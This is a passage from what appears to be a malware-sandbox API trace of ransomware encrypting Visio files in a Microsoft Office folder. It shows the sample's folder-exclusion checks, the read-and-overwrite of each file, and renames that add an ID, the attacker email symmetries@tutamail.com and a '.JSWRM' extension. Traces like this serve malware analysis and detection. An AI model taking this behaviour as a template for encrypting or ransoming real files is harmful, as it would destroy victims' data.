returned 24 [0146.089] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0146.089] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0146.089] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0146.089] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0146.089] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0146.090] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0146.090] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0146.090] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e458 [0146.090] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0146.090] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0146.090] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BPRES_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bpres_u.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BPRES_U.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bpres_u.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0146.092] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e458 | out: hHeap=0x1e0000) returned 1 [0146.092] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0146.092] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0146.092] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x49acf59, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x49acf59, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x49acf59, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x559, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="BRAINSTM.XML", cAlternateFileName="")) returned 1 [0146.092] lstrcmpiW (lpString1="BRAINSTM.XML", lpString2=".") returned 1 [0146.092] lstrcmpiW (lpString1="BRAINSTM.XML", lpString2="..") returned 1 [0146.092] lstrcmpiW (lpString1="BRAINSTM.XML", lpString2="...") returned 1 [0146.092] lstrcmpiW (lpString1="BRAINSTM.XML", lpString2="windows") returned -1 [0146.092] lstrcmpiW (lpString1="BRAINSTM.XML", lpString2="recovery") returned -1 [0146.092] lstrcmpiW (lpString1="BRAINSTM.XML", lpString2="perflogs") returned -1 [0146.092] lstrcmpiW (lpString1="BRAINSTM.XML", lpString2="documents and settings") returned -1 [0146.092] lstrcmpiW (lpString1="BRAINSTM.XML", lpString2="$RECYCLE.BIN") returned 1 [0146.092] lstrcmpiW (lpString1="BRAINSTM.XML", lpString2="system volume information") returned -1 [0146.092] lstrcmpiW (lpString1="BRAINSTM.XML", lpString2="msocache") returned -1 [0146.092] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0146.092] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRAINSTM.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0146.092] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRAINSTM.XML", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BRAINSTM.XML", lpUsedDefaultChar=0x0) returned 12 [0146.092] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0146.092] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0146.092] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRAINSTM.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0146.093] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRAINSTM.XML", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BRAINSTM.XML", lpUsedDefaultChar=0x0) returned 12 [0146.093] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0146.093] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0146.093] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0146.093] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0146.093] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0146.093] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0146.093] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BRAINSTM.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\brainstm.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0146.094] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=1369) returned 1 [0146.094] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x550) returned 0x2332c0 [0146.094] ReadFile (in: hFile=0x314, lpBuffer=0x2332c0, nNumberOfBytesToRead=0x550, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesRead=0x345e534*=0x550, lpOverlapped=0x0) returned 1 [0146.104] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.104] WriteFile (in: hFile=0x314, lpBuffer=0x2332c0*, nNumberOfBytesToWrite=0x550, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesWritten=0x345e530*=0x550, lpOverlapped=0x0) returned 1 [0146.104] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2332c0 | out: hHeap=0x1e0000) returned 1 [0146.104] CloseHandle (hObject=0x314) returned 1 [0146.104] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0146.104] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0146.105] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0146.105] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0146.105] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0146.105] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0146.105] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0146.105] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0146.105] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0146.105] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0146.105] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0146.105] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e458 [0146.105] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0146.105] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0146.105] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BRAINSTM.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\brainstm.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BRAINSTM.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\brainstm.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0146.106] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e458 | out: hHeap=0x1e0000) returned 1 [0146.106] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0146.106] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0146.106] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x332cc84, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x332cc84, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x332cc84, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x6e16, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="BSTORM_M.VSSX", cAlternateFileName="BSTORM~2.VSS")) returned 1 [0146.106] lstrcmpiW (lpString1="BSTORM_M.VSSX", lpString2=".") returned 1 [0146.106] lstrcmpiW (lpString1="BSTORM_M.VSSX", lpString2="..") returned 1 [0146.106] lstrcmpiW (lpString1="BSTORM_M.VSSX", lpString2="...") returned 1 [0146.106] lstrcmpiW (lpString1="BSTORM_M.VSSX", lpString2="windows") returned -1 [0146.106] lstrcmpiW (lpString1="BSTORM_M.VSSX", lpString2="recovery") returned -1 [0146.106] lstrcmpiW (lpString1="BSTORM_M.VSSX", lpString2="perflogs") returned -1 [0146.106] lstrcmpiW (lpString1="BSTORM_M.VSSX", lpString2="documents and settings") returned -1 [0146.106] lstrcmpiW (lpString1="BSTORM_M.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0146.106] lstrcmpiW (lpString1="BSTORM_M.VSSX", lpString2="system volume information") returned -1 [0146.106] lstrcmpiW (lpString1="BSTORM_M.VSSX", lpString2="msocache") returned -1 [0146.106] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0146.106] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BSTORM_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0146.106] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BSTORM_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BSTORM_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0146.107] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0146.107] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0146.107] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BSTORM_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0146.107] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BSTORM_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BSTORM_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0146.107] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0146.107] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0146.107] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0146.107] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0146.107] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0146.107] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0146.107] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BSTORM_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bstorm_m.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0146.108] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=28182) returned 1 [0146.108] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.108] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6e10) returned 0x27b348 [0146.109] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x6e10, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x6e10, lpOverlapped=0x0) returned 1 [0146.118] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.118] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x6e10, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x6e10, lpOverlapped=0x0) returned 1 [0146.118] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0146.118] CloseHandle (hObject=0x314) returned 1 [0146.118] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0146.118] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0146.118] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0146.118] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0146.118] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0146.118] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0146.118] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0146.118] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0146.118] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0146.118] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0146.119] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0146.119] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dff8 [0146.119] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0146.119] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0146.119] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BSTORM_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bstorm_m.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BSTORM_M.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bstorm_m.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0146.120] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dff8 | out: hHeap=0x1e0000) returned 1 [0146.120] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0146.120] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0146.120] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x49acf59, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x49acf59, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x49acf59, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x6bf4, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="BSTORM_M.VSTX", cAlternateFileName="BSTORM~1.VST")) returned 1 [0146.120] lstrcmpiW (lpString1="BSTORM_M.VSTX", lpString2=".") returned 1 [0146.120] lstrcmpiW (lpString1="BSTORM_M.VSTX", lpString2="..") returned 1 [0146.120] lstrcmpiW (lpString1="BSTORM_M.VSTX", lpString2="...") returned 1 [0146.120] lstrcmpiW (lpString1="BSTORM_M.VSTX", lpString2="windows") returned -1 [0146.120] lstrcmpiW (lpString1="BSTORM_M.VSTX", lpString2="recovery") returned -1 [0146.120] lstrcmpiW (lpString1="BSTORM_M.VSTX", lpString2="perflogs") returned -1 [0146.120] lstrcmpiW (lpString1="BSTORM_M.VSTX", lpString2="documents and settings") returned -1 [0146.120] lstrcmpiW (lpString1="BSTORM_M.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0146.120] lstrcmpiW (lpString1="BSTORM_M.VSTX", lpString2="system volume information") returned -1 [0146.120] lstrcmpiW (lpString1="BSTORM_M.VSTX", lpString2="msocache") returned -1 [0146.120] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0146.120] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BSTORM_M.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0146.120] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BSTORM_M.VSTX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BSTORM_M.VSTX", lpUsedDefaultChar=0x0) returned 13 [0146.120] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0146.120] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0146.120] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BSTORM_M.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0146.120] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BSTORM_M.VSTX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BSTORM_M.VSTX", lpUsedDefaultChar=0x0) returned 13 [0146.120] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0146.120] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0146.120] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0146.120] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0146.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0146.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0146.121] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BSTORM_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bstorm_m.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0146.121] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=27636) returned 1 [0146.121] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6bf0) returned 0x27b348 [0146.121] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x6bf0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x6bf0, lpOverlapped=0x0) returned 1 [0146.126] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.126] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x6bf0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x6bf0, lpOverlapped=0x0) returned 1 [0146.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0146.127] CloseHandle (hObject=0x314) returned 1 [0146.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0146.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0146.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0146.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0146.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0146.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0146.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0146.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0146.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0146.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0146.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0146.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e8b8 [0146.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0146.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0146.127] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BSTORM_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bstorm_m.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BSTORM_M.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bstorm_m.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0146.128] HeapFree (in: hHeap=0x1e0000, 